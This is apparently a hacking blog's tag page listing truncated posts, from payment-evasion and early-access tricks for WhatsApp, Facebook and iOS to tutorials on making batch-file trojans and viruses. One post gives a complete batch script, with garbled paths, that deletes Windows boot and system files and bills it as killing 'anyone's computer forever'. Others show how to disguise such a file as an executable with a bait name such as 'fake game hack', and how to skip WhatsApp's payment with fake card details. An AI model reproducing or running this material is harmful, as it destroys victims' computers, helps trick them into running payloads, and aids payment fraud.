Saturday, March 15

Tag: Hack

[ANDROID] How To Extend The WhatsApp License for Free

[ANDROID] How To Extend The WhatsApp License for Free

I’ve been using Whatsapp application for my android phone for almost 1 year, and usually they will limit the license only for one year only and charge $1. This is very cheap i know but the problem is the payment is using credit card, I assume many of you (read : youngster) don't have one, so here we go on How To Extend The WhatsApp License for Free : Steps : Login to Whatsapp and go to Whatsapp >Settings> Account Info Find your expiration date then click “Purchase Online” button, a new windows will appears. In the payment page, choose Google Checkout and finish your purchase In the credit card column you don't need to enter anything, just enter the month and year of credit card expiration date (make it make sense!) Follow the instructions When you need to enter PIN, enter 4 d...
[UPDATE] Facebook Timeline Profiles – Get it Now

[UPDATE] Facebook Timeline Profiles – Get it Now

Facebook has now officially launched Timelines. To get timeline, simply go to the Introducing Timeline page and click Get It Now. If you cannot wait until then for the new Facebook profile page design called Timeline, then why not masquerade as a Facebook app developer and get the new design RIGHT NOW? Designing a really pimping profile could be something to do on a rainy day. Greg Kumparak from TechCrunch discovered that Facebook app developers get a preview of the new timeline feature. Anyone can sign up to the app developer program, without committing yourself to a project. So if you are itching to see the new stuff, just activate a developer account. The whole process takes less than five minutes. Here's what you need to do: Step 1: Sea...
Remove Fb Ticker & Get Old FB Chat Bar Back

Remove Fb Ticker & Get Old FB Chat Bar Back

Facebook Sidebar Chat Reversion Do you want your Facebook sidebar to show ALL your online friends? Do you wish that your Facebook sidebar didn't waste space on friends that aren't even online? Do you want your Facebook sidebar to look like this? Without the blur of course! Well here is the solution for you!!! Firefox Users In order to run the code required to make the transformations, you must install a Firefox Add-on called Greasemonkey. It can be downloaded from here: Step 1: Visit the above link and click on "Add to Firefox" Step 2: Once downloaded, you will see the following alert, click "Install" Step 3: Once it is installed, it will alert you to restart Firefox, please do so Step 4: Then go here: htt...
Check Out iOS 5, Today!

Check Out iOS 5, Today!

Apple released the iOS 5 SDK for developers the other day, and now it seems that because of that a young iOS developer Mert Erdir has discovered a way to install iOS 5 on your iPhone without the need for a developer account. He has found a way on your iPhone 4  to upgrade it to iOS 5 without developer accounts, using a simple backdoor. Anyone can do it following these apparently simple instructions     You can find out full details of how this can be done over at Gizmodo, although for your convenience we have also summarized the instructions here below: First you may need to download and install iOS 5 (to download and install iOS 5 either search for torrents or Option+Restore your iPhone in iTunes) but here’s how to crack the activation: Activate iOS 5 1. Triple ...

Making your own Trojan in bat file in windows

Open a dos prompt we will only need a dos prompt and windows xp operating system -Basics- Opening a dos prompt -> Go to start and then execute and type cmd and press ok Now insert this command: net And you will get something like this NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] In this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some of those commands and put them on a .bat file. What is a .bat file? Bat fi...

How to Make a batch virus using Notepad

How to build a simple .bat virus Index 1. Tools 2. What makes a virus a virus 3. Making your first batch file 4. Making a batch virus 5. Destructive commands 6. Most common tricks used to make someone open the file 1. Tools To make a batch program you will need a text program (ex. Word,notepad,wordpad etc..) A keyboard if you don't have one you can use the ON-screen keyboard To get to the on-screen keyboard start>all programs>accessories>accessibility 2. What makes a virus a virus When people think of a virus they think of a computer virus but the word virus came from a virus that's in your body. They also think a virus is meant to dele...

Shut Down Anyone's Computer Forever…

@echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini Open up notepad and copy and paste that. Save it as a .bat file. This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)   Technorati Tags: .bat,shutdown,batch file

Change your .bat file to .exe

when it is in .exe form no one will be able to change look or modify the code (note:it will make it to a self extraction thing but it will still act like a exe) This is how you make it to a .exe goto to start run and type C:WINDOWSsystem32 find a program called iexpress.exe STEP BY STEP ON HOW TO USE IT click create new self extraction then next. click extract files and run an installation command and click next. type what you want to name the files (ex. hello,virus,fake game hack) then click next. click no prompt then next. license agreement unless you want to put one click do not display license. package files(most important) click add then choose your .bat file(also does .vbs files) then click next. under install program choose your .bat or ...